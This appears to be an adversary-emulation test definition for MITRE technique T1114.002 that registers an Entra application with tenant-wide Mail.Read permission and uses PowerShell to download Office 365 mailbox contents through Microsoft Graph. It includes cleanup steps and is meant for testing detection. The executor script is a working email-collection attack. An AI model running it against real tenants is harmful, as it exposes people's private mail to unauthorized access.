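attack_technique: T1114.002
display_name: 'Email Collection: Remote Email Collection'
atomic_tests:
- name: Office365 - Remote Mail Collected
  auto_generated_guid: 36657d95-d9d6-4fbf-8a31-f4085607bafd
  description: |
    Create and register an Entra application that downloads emails from a tenant's Office 365 mailboxes using
    Microsoft Graph API app-only access. This can be used by an adversary to collect an organization's sensitive information.

    The test signs in with a password-only admin account (Connect-AzAccount -Credential), registers an application,
    grants it the Mail.Read application permission, authenticates as the application with a self-signed certificate
    and reads the messages of the target mailboxes.

    WARNING: while the test is running, the tenant contains an application registration with tenant-wide Mail.Read
    application permission and an exportable private key in the current user's certificate store. If the cleanup
    command fails, remove the application named "T1114.002 Atomic Test #1 - Office365 - Remote Email Collection"
    and the "CN=PowerShell Application" certificate manually.
  supported_platforms:
  - office-365
  input_arguments:
    username:
      description: Full username (including @domain) of an Entra user holding the AppRoleAssignment.ReadWrite.All and Application.ReadWrite.All scopes (e.g. the Global Administrator role). The account must use password-only sign-in, because Connect-AzAccount -Credential cannot satisfy MFA.
      type: string
      default:
    password:
      description: Entra user password (passed in clear text on the command line; use a dedicated lab account)
      type: string
      default:
    1st_target_mailbox:
      description: office-365 target_email_address (primary SMTP address of the mailbox; leave empty to skip)
      type: string
      default:
    2nd_target_mailbox:
      description: office-365 target_email_address (primary SMTP address of the mailbox; leave empty to skip)
      type: string
      default:
    3rd_target_mailbox:
      description: office-365 target_email_address (primary SMTP address of the mailbox; leave empty to skip)
      type: string
      default:
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft Graph PowerShell SDK must be installed.
    prereq_command: |
      $RequiredModule = Get-InstalledModule Microsoft.Graph
      if (-not $RequiredModule) {exit 1} else {exit 0}
    get_prereq_command: |
      Install-Module Microsoft.Graph -Scope CurrentUser
  - description: |
      Az.Accounts module must be installed.
    prereq_command: |
      $RequiredModule2 = Get-InstalledModule Az.Accounts
      if (-not $RequiredModule2) {exit 1} else {exit 0}
    get_prereq_command: |
      Install-Module Az.Accounts -Scope CurrentUser
  executor:
    command: |
      # Step 1: sign in as the (password-only) admin user and obtain a Graph token for the delegated setup steps.
      $ss = ConvertTo-SecureString "#{password}" -AsPlainText -Force
      $cred = New-Object PSCredential -ArgumentList '#{username}', $ss
      $param = @{
        Credential = $cred
        Force = $true
      }
      $null = Connect-AzAccount @param
      $token = (Get-AzAccessToken -ResourceTypeName MSGraph -ErrorAction Stop).Token
      # Az.Accounts returns the token as a string or a SecureString depending on its version, and
      # Connect-MgGraph -AccessToken expects one or the other depending on the Graph SDK version.
      # Convert to whatever the installed Connect-MgGraph declares instead of assuming a version.
      $wantsSecure = (Get-Command Connect-MgGraph).Parameters['AccessToken'].ParameterType -eq [securestring]
      if ($wantsSecure -and $token -is [string]) {
        $token = ConvertTo-SecureString $token -AsPlainText -Force
      } elseif (-not $wantsSecure -and $token -is [securestring]) {
        $token = [System.Net.NetworkCredential]::new('', $token).Password
      }

      # Step 2: create the application's credential. The key is exportable so the cleanup step can delete it;
      # it is a lab artifact and must be removed (see cleanup_command).
      $cert = New-SelfSignedCertificate -Subject "CN=PowerShell Application" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature -KeyLength 2048 -KeyAlgorithm RSA -HashAlgorithm SHA256

      # Microsoft Graph resource appId; the Scope entries are delegated permission ids and the
      # Role entry is the application permission that is granted below as the "Mail.Read" app role.
      $graphAppId = "00000003-0000-0000-c000-000000000000"
      $reqResourceAccess = ( @{ "resourceAccess" = (@{"id"= "570282fd-fa5c-430d-a7fd-fc8dc98a9dca"; "type"= "Scope"}, @{ "id"= "7427e0e9-2fba-42fe-b0c0-848c9e6a8182"; "type"= "Scope"}, @{"id"= "37f7f235-527c-4136-accd-4a02d197296e"; "type"= "Scope"}, @{"id"= "14dad69e-099b-42c9-810b-d002981feec1"; "type"= "Scope"}, @{ "id"= "e1fe6dd8-ba31-4d61-89e7-88639da4683d"; "type"= "Scope"}, @{ "id"= "810c84a8-4a9e-49e6-bf7d-12d183f40d01"; "type"= "Role"}); "resourceAppId" = $graphAppId })

      Connect-MgGraph -AccessToken $token
      $context = Get-MgContext

      # Step 3: register the application, create its service principal and grant it Mail.Read (application).
      $app = New-MgApplication -DisplayName "T1114.002 Atomic Test #1 - Office365 - Remote Email Collection" -RequiredResourceAccess $reqResourceAccess -Web @{ RedirectUris="http://localhost"; } -KeyCredentials @(@{ Type="AsymmetricX509Cert"; Usage="Verify"; Key=$cert.RawData })
      New-MgServicePrincipal -AppId $app.AppId -AdditionalProperties @{} | Out-Null
      $resourceSPN = Get-MgServicePrincipal -Filter "AppId eq '$($app.AppId)'"
      # Resolve the Graph service principal by its well-known appId rather than by display name:
      # any tenant can contain other service principals whose DisplayName is "Microsoft Graph".
      $graphApiApp = Get-MgServicePrincipal -Filter "AppId eq '$graphAppId'"
      $mailRole = $graphApiApp.AppRoles | Where-Object Value -eq "Mail.Read"
      New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $resourceSPN.Id -PrincipalId $resourceSPN.Id -ResourceId $graphApiApp.Id -AppRoleId $mailRole.Id | Out-Null

      # Step 4: resolve the target mailboxes to user object ids while still holding the delegated token
      # (the application identity only has Mail.Read, not user directory read).
      # A server-side filter is used instead of enumerating Get-MgUser, whose default output is only the
      # first page and silently misses mailboxes in larger tenants. Empty inputs are skipped.
      $mailboxes = @("#{1st_target_mailbox}", "#{2nd_target_mailbox}", "#{3rd_target_mailbox}") | Where-Object { $_ }
      [System.Collections.ArrayList]$selectUsers = @()
      foreach ($mailbox in $mailboxes) {
        $escaped = $mailbox.Replace("'", "''")
        foreach ($user in (Get-MgUser -Filter "mail eq '$escaped'" -Property Id,Mail)) {
          $null = $selectUsers.Add($user.Id)
        }
      }
      if ($selectUsers.Count -eq 0) { Write-Warning "None of the target mailboxes were found in the tenant; no messages will be read." }

      # Step 5: authenticate as the application (certificate, app-only) and pull the messages.
      # The certificate is selected by thumbprint so a second certificate with the same subject cannot be picked up.
      # A brand-new registration may not be usable for sign-in for a few seconds, so retry briefly.
      $connected = $false
      for ($attempt = 0; $attempt -lt 6 -and -not $connected; $attempt++) {
        try {
          Connect-MgGraph -ClientId $app.AppId -TenantId $context.TenantId -CertificateThumbprint $cert.Thumbprint -ErrorAction Stop
          $connected = $true
        } catch {
          if ($attempt -ge 5) { throw }
          Start-Sleep -Seconds 10
        }
      }
      foreach ($userId in $selectUsers) {
        $url = "https://graph.microsoft.com/v1.0/users/$userId/messages"
        Invoke-MgGraphRequest -Uri $url -Method GET -OutputType PSObject
      }
    cleanup_command: |
      # Cleanup runs in a fresh session, so the $app and $cert variables from the executor do not exist here;
      # the artifacts are located by the fixed names the executor gave them. Remove-MgApplication takes the
      # application object id, not the AppId (client id).
      Connect-MgGraph -Scopes AppRoleAssignment.ReadWrite.All,Application.ReadWrite.All,User.Read -NoWelcome
      $appName = "T1114.002 Atomic Test #1 - Office365 - Remote Email Collection"
      Get-MgApplication -Filter "DisplayName eq '$appName'" | ForEach-Object { Remove-MgApplication -ApplicationId $_.Id }
      # Delete the self-signed certificate together with its private key.
      Get-ChildItem Cert:\CurrentUser\My | Where-Object Subject -eq "CN=PowerShell Application" | ForEach-Object { Remove-Item -Path $_.PSPath -DeleteKey }
      Disconnect-MgGraph
    name: powershell
    elevation_required: false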